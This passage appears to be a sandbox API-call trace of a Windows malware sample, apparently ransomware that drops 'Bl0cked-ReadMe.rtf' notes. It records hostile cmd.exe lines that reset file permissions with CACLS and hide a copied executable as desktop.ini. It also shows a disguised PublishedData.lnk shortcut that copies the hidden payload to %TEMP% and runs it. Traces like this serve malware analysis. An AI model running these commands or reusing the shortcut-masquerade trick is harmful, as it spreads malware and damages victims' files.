dwLen=0x28, pbBuffer=0x12ec60 | out: pbBuffer=0x12ec60) returned 1 [0114.969] CryptReleaseContext (hProv=0x1c95c8, dwFlags=0x0) returned 1 [0114.969] ReleaseMutex (hMutex=0xf8) returned 1 [0114.969] ReleaseMutex (hMutex=0xf8) returned 1 [0114.969] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0114.969] ReleaseMutex (hMutex=0xf8) returned 1 [0114.969] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0114.969] ReleaseMutex (hMutex=0xf8) returned 1 [0114.969] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0114.969] ReleaseMutex (hMutex=0xf8) returned 1 [0114.969] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0114.969] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", lpFilePart=0x12eab4*="RacWmiDatabase.sdf") returned 0x41 [0114.969] GetLastError () returned 0x20 [0114.969] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\xacf8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x51 [0115.200] LocalFree (hMem=0x1cacf8) returned 0x0 [0115.200] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0115.200] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0115.200] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0115.200] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0115.200] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0115.200] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0115.200] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\"", lpProcessInformation=0x12fba4*(hProcess=0xfc, hThread=0xf4, dwProcessId=0xdfc, dwThreadId=0xe00)) returned 1 [0115.338] WaitForSingleObject (hHandle=0xfc, dwMilliseconds=0xffffffff) returned 0x0 [0119.248] CloseHandle (hObject=0xfc) returned 1 [0119.248] CloseHandle (hObject=0xf4) returned 1 [0119.248] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0119.248] ReleaseMutex (hMutex=0xf8) returned 1 [0119.248] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0119.248] ReleaseMutex (hMutex=0xf8) returned 1 [0119.249] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0119.249] ReleaseMutex (hMutex=0xf8) returned 1 [0119.249] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0119.249] ReleaseMutex (hMutex=0xf8) returned 1 [0119.249] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0119.249] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", lpFilePart=0x12eab4*="RacWmiDatabase.sdf") returned 0x41 [0119.249] GetLastError () returned 0x20 [0119.249] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\xacf8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x51 [0119.249] LocalFree (hMem=0x1cacf8) returned 0x0 [0119.249] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0119.249] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0119.250] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0119.250] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0119.250] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\RAC\\PUBLISHEDDATA\\") returned 0x2f [0119.250] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\RAC\\PUBLISHEDDATA\\", cchCount1=47, lpString2="", cchCount2=0) returned 3 [0119.250] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\RAC\\PUBLISHEDDATA\\") returned 0x2f [0119.250] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0119.250] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\RAC\\PUBLISHEDDATA\\", cchCount1=47, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0119.250] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x14a8b5c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0119.250] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0119.251] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0119.251] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\", lpszShortPath=0x14a8b5c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\") returned 0x28 [0119.251] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0119.251] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0119.251] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0xfc, hThread=0xf4, dwProcessId=0xf34, dwThreadId=0xf38)) returned 1 [0119.285] CloseHandle (hObject=0xfc) returned 1 [0119.285] CloseHandle (hObject=0xf4) returned 1 [0119.285] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\bl0cked-readme.rtf")) returned 0xffffffff [0119.285] GetLastError () returned 0x2 [0119.286] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0119.303] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\bl0cked-readme.rtf")) returned 0x2020 [0119.303] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0119.303] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1c95c8 [0119.303] FindClose (in: hFindFile=0x1c95c8 | out: hFindFile=0x1c95c8) returned 1 [0119.303] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0119.303] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x14a8b5c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0119.303] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0119.303] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0119.303] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\") returned 0x28 [0119.304] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0119.304] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0119.304] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData", lpszShortPath=0x14a8b5c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1") returned 0x27 [0119.305] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x15a | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x15a [0119.305] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0119.305] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\"", lpProcessInformation=0x12fb78*(hProcess=0xf4, hThread=0xfc, dwProcessId=0xf3c, dwThreadId=0xf40)) returned 1 [0119.306] WaitForSingleObject (hHandle=0xf4, dwMilliseconds=0xffffffff) returned 0x0 [0120.222] CloseHandle (hObject=0xf4) returned 1 [0120.222] CloseHandle (hObject=0xfc) returned 1 [0120.222] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0120.222] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1c95c8 [0120.222] FindClose (in: hFindFile=0x1c95c8 | out: hFindFile=0x1c95c8) returned 1 [0120.222] GetTickCount () returned 0x28796 [0120.222] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=17701124563) returned 1 [0120.222] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0120.222] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="e") returned 1 [0120.222] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="x") returned 1 [0120.222] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="o") returned 1 [0120.222] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="h") returned 1 [0120.222] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="z") returned 1 [0120.222] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="o") returned 1 [0120.222] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="3") returned 1 [0120.222] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0120.222] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0120.222] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0120.222] CharUpperBuffW (in: lpsz="explorer.exe \"PublishedData\" & type \"PublishedData\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x6b | out: lpsz="EXPLORER.EXE \"PUBLISHEDDATA\" & TYPE \"PUBLISHEDDATA\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x6b [0120.222] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0120.223] CharUpperBuffW (in: lpsz="explorer.exe \"PublishedData\" & type \"PublishedData\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x6c | out: lpsz="EXPLORER.EXE \"PUBLISHEDDATA\" & TYPE \"PUBLISHEDDATA\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x6c [0120.223] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0120.223] CoInitialize (pvReserved=0x0) returned 0x0 [0120.966] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d2a78) returned 0x0 [0121.300] ShellLink:IUnknown:QueryInterface (in: This=0x1d2a78, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d2a50) returned 0x0 [0121.301] ShellLink:IUnknown:QueryInterface (in: This=0x1d2a78, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d2a5c) returned 0x0 [0121.301] ShellLink:IShellLinkW:SetPath (This=0x1d2a50, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0126.439] ShellLink:IShellLinkW:SetArguments (This=0x1d2a50, pszArgs="/C explorer.exe \"PublishedData\" & type \"PublishedData\\desktop.ini\" > \"%TEMP%\\Cexohzo3.exe\" && \"%TEMP%\\Cexohzo3.exe\"") returned 0x0 [0126.440] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d2a50, pszDir="%CD%") returned 0x0 [0126.440] ShellLink:IShellLinkW:SetIconLocation (This=0x1d2a50, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0126.440] ShellLink:IShellLinkW:SetShowCmd (This=0x1d2a50, iShowCmd=7) returned 0x0 [0126.440] ShellLink:IPersistFile:Save (This=0x1d2a5c, pszFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData.lnk", fRemember=0) returned 0x0 [0126.470] ShellLink:IUnknown:Release (This=0x1d2a5c) returned 0x2 [0126.470] ShellLink:IUnknown:Release (This=0x1d2a50) returned 0x1 [0126.470] ShellLink:IUnknown:Release (This=0x1d2a78) returned 0x0 [0126.470] CoUninitialize () [0126.471] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0126.471] ReleaseMutex (hMutex=0xf8) returned 1 [0126.471] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0126.471] ReleaseMutex (hMutex=0xf8) returned 1 [0126.471] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0126.471] ReleaseMutex (hMutex=0xf8) returned 1 [0126.471] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0126.471] ReleaseMutex (hMutex=0xf8) returned 1 [0126.471] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racdatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.472] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf", lpFilePart=0x12eab4*="RacDatabase.sdf") returned 0x3a [0126.472] GetLastError () returned 0x20 [0126.472] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\xb810\x1d\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x51 [0126.472] LocalFree (hMem=0x1db810) returned 0x0 [0126.472] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0126.472] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0126.472] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0126.472] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0126.472] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0126.472] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0126.473] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, 